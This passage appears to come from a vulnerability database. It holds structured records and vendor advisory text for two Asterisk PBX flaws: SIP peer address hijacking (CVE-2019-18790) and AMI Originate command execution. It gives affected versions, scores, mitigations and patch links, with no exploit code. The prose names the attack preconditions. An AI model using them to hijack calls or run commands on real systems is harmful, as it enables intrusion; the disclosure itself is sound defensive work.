"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-0701",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.1"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "16.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "16.6.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.2"
},
{
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "16.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "17.x"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.21"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=16.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=17.*"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.6,
"vendor": "sangoma",
"version": "13.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "13.29.2",
"versionStartIncluding": "13.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "16.6.2",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "17.0.1",
"versionStartIncluding": "17.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bford",
"sources": [
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.7
},
"cve": "CVE-2019-18790",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-18790",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-03059",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-18790",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-18790",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2020-03059",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1291",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service. \n Nature of Advisory Denial of Service \n Susceptibility Remote Unauthenticated Sessions \n Severity Minor \n Exploits Known No \n Reported On October 17, 2019 \n Reported By Andrey V. T. \n Modules Affected channels/chan_sip.c \n\n Resolution Using any other option value for \u201cnat\u201d will prevent the \n attack (such as \u201cnat=no\u201d or \u201cnat=force_rport\u201d), but will \n need to be tested on an individual basis to ensure that it \n works for the user\u2019s deployment. On the fixed versions of \n Asterisk, it will no longer set the address of the peer \n before authentication is successful when a SIP request comes \n in. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All releases \n Asterisk Open Source 16.x All releases \n Asterisk Open Source 17.x All releases \n Certified Asterisk 13.21 All releases \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Asterisk Open Source 16.6.2 \n Asterisk Open Source 17.0.1 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16 \n http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17 \n http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28589 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at \n http://downloads.digium.com/pub/security/AST-2019-006.pdf and \n http://downloads.digium.com/pub/security/AST-2019-006.html \n\n Revision History\n Date Editor Revisions Made \n October 22, 2019 Ben Ford Initial Revision \n November 14, 2019 Ben Ford Corrected and updated fields for \n versioning, and added CVE \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory - AST-2019-006\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "PACKETSTORM",
"id": "155434"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18790",
"trust": 3.1
},
{
"db": "DLINK",
"id": "SAP10005",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "155434",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-03059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4526",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"id": "VAR-201911-0701",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
}
]
},
"last_update_date": "2023-12-18T12:27:54.903000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2019-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "[SECURITY] [DLA 2017-1] asterisk security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/196959"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=103433"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18790"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18790"
},
{
"trust": 0.8,
"url": "https://web.archive.org/web/20131208091355/http://securityadvisories.dlink.com/security/publication.aspx?name=sap10005"
},
{
"trust": 0.6,
"url": "https://seclists.org/fulldisclosure/2019/nov/18"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 0.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html second message url unavailable at time of publishing"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-information-disclosure-via-sip-peer-ip-address-change-30935"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/155434/asterisk-project-security-advisory-ast-2019-006.html"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-006.html"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28589"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-16.diff"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-17.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.21.diff"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-006.pdf"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"date": "2019-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"date": "2019-11-21T23:02:22",
"db": "PACKETSTORM",
"id": "155434"
},
{
"date": "2019-11-22T17:15:11.740000",
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"date": "2019-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"date": "2022-05-13T20:56:27.693000",
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk Vulnerabilities related to lack of authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.6
}
}
VAR-201911-1169
Vulnerability from variot - Updated: 2023-12-18 12:27An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All releases
Asterisk Open Source 16.x All releases
Asterisk Open Source 17.x All releases
Certified Asterisk 13.21 All releases
Corrected In
Product Release
Asterisk Open Source 13.29.2
Asterisk Open Source 16.6.2
Asterisk Open Source 17.0.1
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16
http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17
http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28580
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-007.pdf and
http://downloads.digium.com/pub/security/AST-2019-007.html
Revision History
Date Editor Revisions Made
October 24, 2019 George Joseph Initial Revision
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory - AST-2019-007
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1169",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.1"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "16.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "16.6.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.2"
},
{
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "16.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "17.x"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.21 to 13.21-cert4"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=16.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=17.*"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.6,
"vendor": "sangoma",
"version": "13.21"
},
{
"model": "certified asterisk 13.21-cert4",
"scope": null,
"trust": 0.6,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "13.29.2",
"versionStartIncluding": "13.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "16.6.2",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "17.0.1",
"versionStartIncluding": "17.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
